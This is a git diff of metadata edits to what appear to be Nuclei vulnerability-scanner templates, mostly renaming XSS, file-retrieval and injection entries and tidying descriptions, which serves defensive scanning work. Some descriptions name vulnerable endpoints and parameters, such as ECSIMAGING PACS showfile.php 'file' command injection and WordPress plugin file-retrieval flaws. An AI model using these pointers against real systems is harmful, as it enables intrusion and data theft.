b/exposed-panels/gogs-login.yaml @@ -1,7 +1,7 @@ id: gogs-login info: - name: Sign In - Gogs + name: Gogs (Go Git Service) - Sign In Page author: dhiyaneshDK severity: info metadata: diff --git a/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml b/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml index 59bf6a7764..7022469938 100644 --- a/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml +++ b/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml @@ -1,7 +1,7 @@ id: zyxel-vmg1312b10d-login info: - name: ZYXEL VMG1312-B10D Login Detect + name: Zyxel VMG1312-B10D - Login Detection author: princechaddha severity: info metadata: diff --git a/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml b/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml index 95c475ef83..b11a2c0c5f 100644 --- a/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml +++ b/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml @@ -1,7 +1,7 @@ id: zyxel-vsg1432b101-login info: - name: ZYXEL VSG1432-B101 Login Detect + name: Zyxel VSG1432-B101 - Login Detection author: princechaddha severity: info metadata: diff --git a/exposures/files/gogs-install-exposure.yaml b/exposures/files/gogs-install-exposure.yaml index a7369b2cb4..c3c6b915df 100644 --- a/exposures/files/gogs-install-exposure.yaml +++ b/exposures/files/gogs-install-exposure.yaml @@ -1,7 +1,7 @@ id: gogs-install-exposure info: - name: Gogs install exposure + name: Gogs (Go Git Service) - Install Exposure author: dhiyaneshDk severity: high tags: gogs,exposure diff --git a/headless/window-name-domxss.yaml b/headless/window-name-domxss.yaml index c8fcff19b9..7c202f7d8b 100644 --- a/headless/window-name-domxss.yaml +++ b/headless/window-name-domxss.yaml @@ -1,7 +1,7 @@ id: window-name-domxss info: - name: window.name DOM XSS + name: window.name - DOM Cross-Site Scripting author: pdteam severity: medium reference: diff --git a/misconfiguration/aem/aem-setpreferences-xss.yaml b/misconfiguration/aem/aem-setpreferences-xss.yaml index d58bb560ba..87462f5774 100644 --- a/misconfiguration/aem/aem-setpreferences-xss.yaml +++ b/misconfiguration/aem/aem-setpreferences-xss.yaml @@ -1,7 +1,7 @@ id: aem-setpreferences-xss info: - name: AEM setPreferences XSS + name: AEM setPreferences - Cross-Site Scripting author: zinminphy0,dhiyaneshDK severity: medium reference: @@ -27,4 +27,4 @@ requests: - type: status status: - - 400 \ No newline at end of file + - 400 diff --git a/misconfiguration/akamai-arl-xss.yaml b/misconfiguration/akamai-arl-xss.yaml index f447dbdb60..6a9c5fd334 100644 --- a/misconfiguration/akamai-arl-xss.yaml +++ b/misconfiguration/akamai-arl-xss.yaml @@ -1,7 +1,7 @@ id: akamai-arl-xss info: - name: Open Akamai ARL XSS + name: Open Akamai ARL - Cross-Site Scripting author: pdteam severity: medium reference: @@ -28,4 +28,4 @@ requests: - type: word part: header words: - - 'text/html' \ No newline at end of file + - 'text/html' diff --git a/misconfiguration/ampps-dirlisting.yaml b/misconfiguration/ampps-dirlisting.yaml index 995d6fb8b5..ad455130e5 100644 --- a/misconfiguration/ampps-dirlisting.yaml +++ b/misconfiguration/ampps-dirlisting.yaml @@ -1,7 +1,7 @@ id: ampps-dirlisting info: - name: AMPPS by Softaculous - Directory Listing Enabled + name: AMPPS by Softaculous - Directory Listing author: deFr0ggy severity: info tags: panel,ampps,softaculous,misconfig diff --git a/misconfiguration/d-link-arbitary-fileread.yaml b/misconfiguration/d-link-arbitary-fileread.yaml index 1528be0049..453ed0fb23 100644 --- a/misconfiguration/d-link-arbitary-fileread.yaml +++ b/misconfiguration/d-link-arbitary-fileread.yaml @@ -1,7 +1,7 @@ id: dlink-file-read info: - name: D-Link Arbitrary File Read + name: D-Link - Arbitrary File Retrieval author: dhiyaneshDK severity: high reference: diff --git a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml index bf7d0f70de..4c3f3c6236 100644 --- a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml +++ b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml @@ -1,7 +1,7 @@ id: moodle-filter-jmol-xss info: - name: Moodle filter_jmol - XSS + name: Moodle filter_jmol - Cross-Site Scripting author: madrobot severity: medium description: Cross-site scripting on Moodle. @@ -28,4 +28,4 @@ requests: - type: word part: header words: - - "text/html" \ No newline at end of file + - "text/html" diff --git a/vulnerabilities/moodle/moodle-xss.yaml b/vulnerabilities/moodle/moodle-xss.yaml index 3f3938d9db..5dcfe36be5 100644 --- a/vulnerabilities/moodle/moodle-xss.yaml +++ b/vulnerabilities/moodle/moodle-xss.yaml @@ -1,7 +1,7 @@ id: moodle-xss info: - name: Moodle redirect_uri Reflected XSS + name: Moodle redirect_uri - Cross-Site Scripting author: hackergautam severity: medium description: XSS in moodle via redirect_uri parameter diff --git a/vulnerabilities/netsweeper/netsweeper-rxss.yaml b/vulnerabilities/netsweeper/netsweeper-rxss.yaml index 2d493bd7f4..18892a3101 100644 --- a/vulnerabilities/netsweeper/netsweeper-rxss.yaml +++ b/vulnerabilities/netsweeper/netsweeper-rxss.yaml @@ -1,7 +1,7 @@ id: netsweeper-rxss info: - name: Netsweeper 4.0.9 - Cross Site Scripting Injection + name: Netsweeper 4.0.9 - Cross-Site Scripting author: daffainfo severity: medium reference: diff --git a/vulnerabilities/oracle/oracle-ebs-xss.yaml b/vulnerabilities/oracle/oracle-ebs-xss.yaml index c5252391cf..23bd3eea02 100644 --- a/vulnerabilities/oracle/oracle-ebs-xss.yaml +++ b/vulnerabilities/oracle/oracle-ebs-xss.yaml @@ -1,7 +1,7 @@ id: oracle-ebs-xss info: - name: Oracle EBS XSS + name: Oracle EBS - Cross-Site Scripting author: dhiyaneshDk severity: medium reference: diff --git a/vulnerabilities/other/bems-api-lfi.yaml b/vulnerabilities/other/bems-api-lfi.yaml index a672809b50..fa2efedbb9 100644 --- a/vulnerabilities/other/bems-api-lfi.yaml +++ b/vulnerabilities/other/bems-api-lfi.yaml @@ -1,10 +1,10 @@ id: bems-api-lfi info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + name: Longjing Technology BEMS API 1.21 - Arbitrary File Retrieval author: gy741 severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + description: The application suffers from an unauthenticated arbitrary file retrieval vulnerability. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php tags: lfi diff --git a/vulnerabilities/other/ecsimagingpacs-rce.yaml b/vulnerabilities/other/ecsimagingpacs-rce.yaml index b102fbcffc..115478ee95 100644 --- a/vulnerabilities/other/ecsimagingpacs-rce.yaml +++ b/vulnerabilities/other/ecsimagingpacs-rce.yaml @@ -1,14 +1,16 @@ id: ecsimagingpacs-rce info: - name: ECSIMAGING PACS 6.21.5 - Remote code execution + name: ECSIMAGING PACS <= 6.21.5 - Command Execution and Local File Inclusion author: ritikchaddha severity: critical - description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access + description: ECSIMAGING PACS Application 6.21.5 and below suffer from a command injection vulnerability and a local file include vulnerability. The 'file' parameter on the page /showfile.php can be exploited to perform command execution or local file inclusion. Often on ECSIMAGING PACS, the www-data user has sudo NOPASSWD access. reference: https://www.exploit-db.com/exploits/49388 metadata: verified: false tags: ecsimagingpacs,rce + classification: + cwe-id: CWE-78 requests: - method: GET @@ -24,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by cs 05/12/2022 diff --git a/vulnerabilities/other/eyelock-nano-lfd.yaml b/vulnerabilities/other/eyelock-nano-lfd.yaml index 7fce23a1a5..483437d4b9 100644 --- a/vulnerabilities/other/eyelock-nano-lfd.yaml +++ b/vulnerabilities/other/eyelock-nano-lfd.yaml @@ -1,10 +1,10 @@ id: eyelock-nano-lfd info: - name: EyeLock nano NXT 3.5 - Local File Disclosure + name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval author: geeknik severity: high - description: EyeLock nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This + description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. reference: - https://www.zeroscience.mk/codes/eyelock_lfd.txt diff --git a/vulnerabilities/other/java-melody-xss.yaml b/vulnerabilities/other/java-melody-xss.yaml index 3899625c59..efa41edf75 100644 --- a/vulnerabilities/other/java-melody-xss.yaml +++ b/vulnerabilities/other/java-melody-xss.yaml @@ -1,7 +1,7 @@ id: java-melody-xss info: - name: JavaMelody Monitoring XSS + name: JavaMelody Monitoring - Cross-Site Scripting author: kailashbohara severity: medium description: Reflected cross site scripting (XSS) in JavaMelody monitoring. diff --git a/vulnerabilities/other/kafdrop-xss.yaml b/vulnerabilities/other/kafdrop-xss.yaml index d191b88f28..32f69bbf74 100644 --- a/vulnerabilities/other/kafdrop-xss.yaml +++ b/vulnerabilities/other/kafdrop-xss.yaml @@ -1,10 +1,10 @@ id: kafdrop-xss info: - name: KafDrop XSS + name: KafDrop - Cross-Site Scripting author: dhiyaneshDk severity: medium - description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server. + description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or JavaScript into the response returned by the server. reference: - https://github.com/HomeAdvisor/Kafdrop/issues/12 tags: kafdrop,xss diff --git a/vulnerabilities/other/kyocera-m2035dn-lfi.yaml b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml index f0587dca70..35651ada5b 100644 --- a/vulnerabilities/other/kyocera-m2035dn-lfi.yaml +++ b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml @@ -1,10 +1,10 @@ id: kyocera-m2035dn-lfi info: - name: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) + name: Kyocera Command Center RX ECOSYS M2035dn - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) + description: Kyocera Command Center RX ECOSYS M2035dn - Unauthenticated arbitrary file retrieval. reference: - https://www.exploit-db.com/exploits/50738 - https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html diff --git a/vulnerabilities/other/microstrategy-ssrf.yaml b/vulnerabilities/other/microstrategy-ssrf.yaml index 20b4e2ed73..df76c1a881 100644 --- a/vulnerabilities/other/microstrategy-ssrf.yaml +++ b/vulnerabilities/other/microstrategy-ssrf.yaml @@ -1,10 +1,10 @@ id: microstrategy-ssrf info: - name: MicroStrategy tinyurl - BSSRF + name: MicroStrategy tinyurl - Server-Side Request Forgery (Blind) author: organiccrap severity: high - description: Blind server-side request forgery vulnerability on MicroStrategy URL shortener. + description: Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener. reference: - https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 tags: microstrategy,ssrf diff --git a/vulnerabilities/other/nginx-module-vts-xss.yaml b/vulnerabilities/other/nginx-module-vts-xss.yaml index 9c48e332f3..f0ca677575 100644 --- a/vulnerabilities/other/nginx-module-vts-xss.yaml +++ b/vulnerabilities/other/nginx-module-vts-xss.yaml @@ -1,7 +1,7 @@ id: nginx-module-vts-xss info: - name: Nginx virtual host traffic status module XSS + name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting author: madrobot severity: medium tags: nginx,xss,status diff --git a/vulnerabilities/other/nuuo-file-inclusion.yaml b/vulnerabilities/other/nuuo-file-inclusion.yaml index 9836361754..f577991d4f 100644 --- a/vulnerabilities/other/nuuo-file-inclusion.yaml +++ b/vulnerabilities/other/nuuo-file-inclusion.yaml @@ -1,7 +1,7 @@ id: nuuo-file-inclusion info: - name: NUUO NVRmini 2 3.0.8 Local File Disclosure + name: NUUO NVRmini 2 v3.0.8 - Atrbitary File Retrieval author: princechaddha severity: high reference: diff --git a/vulnerabilities/other/odoo-cms-redirect.yaml b/vulnerabilities/other/odoo-cms-redirect.yaml index cc3be56efb..3fecc9364a 100644 --- a/vulnerabilities/other/odoo-cms-redirect.yaml +++ b/vulnerabilities/other/odoo-cms-redirect.yaml @@ -1,12 +1,13 @@ id: odoo-cms-redirect info: - name: Odoo CMS - Open redirection all Version + name: Odoo CMS - Open Redirect author: 0x_Akoko severity: low - description: Odoo CMS - Open redirection all Version. + description: Odoo CMS - Open redirection in all versions due to Odoo's policy. reference: - https://cxsecurity.com/issue/WLB-2021020143 + - https://www.odoo.com/page/security-nonvuln-redirectors tags: odoo,redirect requests: diff --git a/vulnerabilities/other/oliver-library-lfi.yaml b/vulnerabilities/other/oliver-library-lfi.yaml index 847d04b8a5..4d3eaf3db1 100644 --- a/vulnerabilities/other/oliver-library-lfi.yaml +++ b/vulnerabilities/other/oliver-library-lfi.yaml @@ -1,10 +1,10 @@ id: oliver-library-lfi info: - name: Oliver Library Server v5 - Arbitrary File Download + name: Oliver Library Server v5 <8.00.008.053 - Arbitrary File Retrieval author: gy741 severity: high - description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input. + description: An arbitrary file retrieval vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file retrieval by an attacker using unsanitized user supplied input. reference: - https://www.exploit-db.com/exploits/50599 - https://www.softlinkint.com/product/oliver/ diff --git a/vulnerabilities/other/pbootcms-database-file-download.yaml b/vulnerabilities/other/pbootcms-database-file-download.yaml index b65860d801..9781cd9421 100644 --- a/vulnerabilities/other/pbootcms-database-file-download.yaml +++ b/vulnerabilities/other/pbootcms-database-file-download.yaml @@ -1,7 +1,7 @@ id: pbootcms-database-file-download info: - name: PbootCMS v2.0.7 DB File Download + name: PbootCMS v2.0.7 - pbootcms.db File Download author: ritikchaddha severity: high reference: diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml index 60ca1be4ab..69934ef8a1 100644 --- a/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/vulnerabilities/other/pmb-directory-traversal.yaml @@ -1,10 +1,10 @@ id: pmb-directory-traversal info: - name: PMB 5.6 Directory Traversal + name: PMB 5.6 - Arbitrary File Retrieval author: geeknik severity: medium - description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, this can in turn be used to a Local File Disclosure. + description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, wchi can be used for local file retrieval. reference: - https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html tags: lfi diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml index 64775b42b1..b67c0f99da 100644 --- a/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -1,7 +1,7 @@ id: pmb-local-file-disclosure info: - name: PMB 5.6 - 'chemin' Local File Disclosure + name: PMB 5.6 - getgif.php Arbitrary File Retrieval author: dhiyaneshDk severity: high reference: diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml index d974e51e47..951a568d3d 100644 --- a/vulnerabilities/other/wems-manager-xss.yaml +++ b/vulnerabilities/other/wems-manager-xss.yaml @@ -1,7 +1,7 @@ id: wems-manager-xss info: - name: WEMS Enterprise Manager XSS + name: WEMS Enterprise Manager - Cross-Site Scripting author: pikpikcu severity: medium description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the @@ -26,4 +26,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml b/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml index 2a331438d4..fd86eaf40f 100644 --- a/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml +++ b/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml @@ -1,7 +1,7 @@ id: admin-word-count-column-lfi info: - name: Admin word count column 2.2 - Unauthenticated Local File Download + name: Admin word count column 2.2 - Arbitrary File Retrieval author: daffainfo,Splint3r7 severity: high reference: diff --git a/vulnerabilities/wordpress/aspose-file-download.yaml b/vulnerabilities/wordpress/aspose-file-download.yaml index 2ba41f16fb..2c4b91c5d4 100644 --- a/vulnerabilities/wordpress/aspose-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-file-download.yaml @@ -1,10 +1,10 @@ id: aspose-file-download info: - name: Aspose Cloud eBook Generator - File Download + name: Wordpress Aspose Cloud eBook Generator - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. + description: The Aspose Cloud eBook Generator WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://wpscan.com/vulnerability/7866 tags: wordpress,wp-plugin,lfi,aspose,ebook diff --git a/vulnerabilities/wordpress/aspose-ie-file-download.yaml b/vulnerabilities/wordpress/aspose-ie-file-download.yaml index 095211f5e4..ae52c36233 100644 --- a/vulnerabilities/wordpress/aspose-ie-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-ie-file-download.yaml @@ -1,10 +1,10 @@ id: aspose-ie-file-download info: - name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download + name: Wordpress Aspose Importer & Exporter v1.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose importer and Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/131162/ - https://wordpress.org/plugins/aspose-importer-exporter diff --git a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml index 338fb37c0d..48c499bc3a 100644 --- a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml @@ -1,10 +1,10 @@ id: aspose-pdf-file-download info: - name: WordPress Aspose PDF Exporter File Download + name: WordPress Aspose PDF Exporter - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose.psf Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose.psf Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/131161 - https://wordpress.org/plugins/aspose-pdf-exporter diff --git a/vulnerabilities/wordpress/aspose-words-file-download.yaml b/vulnerabilities/wordpress/aspose-words-file-download.yaml index a9187a88fa..ac80fecb8c 100644 --- a/vulnerabilities/wordpress/aspose-words-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-words-file-download.yaml @@ -1,10 +1,10 @@ id: aspose-words-file-download info: - name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download + name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. reference: - https://wpscan.com/vulnerability/7869 - https://wordpress.org/plugins/aspose-doc-exporter diff --git a/vulnerabilities/wordpress/cherry-file-download.yaml b/vulnerabilities/wordpress/cherry-file-download.yaml index c23bee2695..8ebd3cd3c1 100644 --- a/vulnerabilities/wordpress/cherry-file-download.yaml +++ b/vulnerabilities/wordpress/cherry-file-download.yaml @@ -1,11 +1,10 @@ id: cherry-file-download info: - name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download + name: Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload author: 0x_Akoko severity: high - description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading - backdoor shell scripts or downloading the wp-config.php file. + description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. reference: - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee - https://github.com/CherryFramework/cherry-plugin diff --git a/vulnerabilities/wordpress/diarise-theme-lfi.yaml b/vulnerabilities/wordpress/diarise-theme-lfi.yaml index 5afd776733..366df9bb91 100644 --- a/vulnerabilities/wordpress/diarise-theme-lfi.yaml +++ b/vulnerabilities/wordpress/diarise-theme-lfi.yaml @@ -1,10 +1,10 @@ id: diarise-theme-lfi info: - name: WordPress Diarise 1.5.9 Local File Disclosure + name: WordPress Diarise 1.5.9 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: WordPress Diarise theme version 1.5.9 suffers from a local file disclosure vulnerability. + description: WordPress Diarise theme version 1.5.9 suffers from a local file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html - https://cxsecurity.com/issue/WLB-2019050123 diff --git a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml index 19cfc73b7b..af1015d333 100644 --- a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml +++ b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml @@ -1,7 +1,7 @@ id: flow-flow-social-stream-xss info: - name: Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Reflected XSS + name: Flow-Flow Social Stream <= 3.0.71 - Cross-Site Scripting author: alph4byt3 severity: medium reference: diff --git a/vulnerabilities/wordpress/hb-audio-lfi.yaml b/vulnerabilities/wordpress/hb-audio-lfi.yaml index fe14c73834..4a0e7ea744 100644 --- a/vulnerabilities/wordpress/hb-audio-lfi.yaml +++ b/vulnerabilities/wordpress/hb-audio-lfi.yaml @@ -1,7 +1,7 @@ id: hb-audio-lfi info: - name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download + name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Retrieval author: dhiyaneshDK severity: high reference: diff --git a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml index 7bb0cdbba5..6f1dfbf9fe 100644 --- a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml +++ b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml @@ -1,10 +1,10 @@ id: nativechurch-wp-theme-lfd info: - name: WordPress NativeChurch Theme Arbitrary File Download + name: WordPress NativeChurch Theme - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable. + description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system. reference: - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html tags: wordpress,wp-theme,lfi diff --git a/vulnerabilities/wordpress/sniplets-xss.yaml b/vulnerabilities/wordpress/sniplets-xss.yaml index 1e4278a691..195e8e384f 100644 --- a/vulnerabilities/wordpress/sniplets-xss.yaml +++ b/vulnerabilities/wordpress/sniplets-xss.yaml @@ -1,7 +1,7 @@ id: sniplets-xss info: - name: Wordpress Plugin Sniplets - XSS + name: Wordpress Plugin Sniplets - Cross-Site Scripting author: dhiyaneshDK severity: medium description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets diff --git a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml index cc7746bd83..05bc6af882 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml @@ -1,7 +1,7 @@ id: wordpress-wordfence-lfi info: - name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure + name: Wordpress Wordfence 7.4.5 - Arbitrary File Retrieval author: 0x_Akoko severity: high reference: diff --git a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml index 94a67888df..b0a50a1cfe 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml @@ -1,7 +1,7 @@ id: wordpress-wordfence-waf-bypass-xss info: - name: Wordfence WAF Bypass WordPress XSS + name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam severity: medium reference: diff --git a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index fff2243202..4094c066d1 100644 --- a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -1,7 +1,7 @@ id: wordpress-zebra-form-xss info: - name: Wordpress Zebra Form XSS + name: Wordpress Zebra Form - Cross-Site Scripting author: madrobot severity: medium reference: @@ -37,4 +37,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/wordpress/wp-code-snippets-xss.yaml b/vulnerabilities/wordpress/wp-code-snippets-xss.yaml index b0c4a89491..ebf8c132fd 100644 --- a/vulnerabilities/wordpress/wp-code-snippets-xss.yaml +++ b/vulnerabilities/wordpress/wp-code-snippets-xss.yaml @@ -1,7 +1,7 @@ id: wp-code-snippets-xss info: - name: Code Snippets Wordpress Plugin - XSS + name: Code Snippets Wordpress Plugin - Cross-Site Scripting author: dhiyaneshDK severity: medium description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, diff --git a/vulnerabilities/wordpress/wp-full-path-disclosure.yaml b/vulnerabilities/wordpress/wp-full-path-disclosure.yaml index 1fc892990b..979bcb56a4 100644 --- a/vulnerabilities/wordpress/wp-full-path-disclosure.yaml +++ b/vulnerabilities/wordpress/wp-full-path-disclosure.yaml @@ -1,11 +1,12 @@ id: wp-full-path-disclosure info: - name: Wordpress Full Path Disclosure + name: Wordpress - Path Disclosure author: arcc severity: info reference: - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files + - https://core.trac.wordpress.org/ticket/38317 tags: debug,wordpress,fpd requests: diff --git a/vulnerabilities/wordpress/wp-haberadam-idor.yaml b/vulnerabilities/wordpress/wp-haberadam-idor.yaml index 9394923565..c8001614ba 100644 --- a/vulnerabilities/wordpress/wp-haberadam-idor.yaml +++ b/vulnerabilities/wordpress/wp-haberadam-idor.yaml @@ -1,7 +1,7 @@ id: wp-haberadam-idor info: - name: WordPress Themes Haberadam IDOR and Full Path Disclosure via JSON API + name: WordPress Themes Haberadam JSON API - IDOR and Path Disclosure author: pussycat0x severity: low reference: diff --git a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml index 84794cc49f..2621c00a21 100644 --- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml +++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml @@ -1,10 +1,10 @@ id: wp-oxygen-theme-lfi info: - name: WordPress Oxygen-Theme Themes LFI + name: WordPress Oxygen-Theme - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter. + description: The WordPress Oxygen-Theme has a local file retrieval vulnerability in 'file' parameter of 'download.php'. reference: - https://cxsecurity.com/issue/WLB-2019030178 tags: wordpress,wp-theme,lfi @@ -25,4 +25,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/vulnerabilities/wordpress/wp-revslider-file-download.yaml b/vulnerabilities/wordpress/wp-revslider-file-download.yaml index 812736d277..c5ea28f80a 100644 --- a/vulnerabilities/wordpress/wp-revslider-file-download.yaml +++ b/vulnerabilities/wordpress/wp-revslider-file-download.yaml @@ -1,10 +1,10 @@ id: wp-revslider-file-download info: - name: Wordpress Revslider - Unauthenticated Arbitrary File Download + name: Wordpress Revslider - Arbitrary File Retrieval author: pussycat0x severity: high - description: The Vulnerable Revslider WordPress plugin was affected by an unauthenticated download vulnerability,This could result in attacker downloading the wp-config.php file. + description: The Revslider WordPress plugin iss affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file. reference: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 diff --git a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml index 56218e0bae..f3d8f59e94 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml @@ -1,7 +1,7 @@ id: wp-woocommerce-file-download info: - name: WordPress WooCommerce < 1.2.7 - Unauthenticated File Download + name: WordPress WooCommerce < 1.2.7 - Arbitrary File Retrieval author: 0x_Akoko severity: high 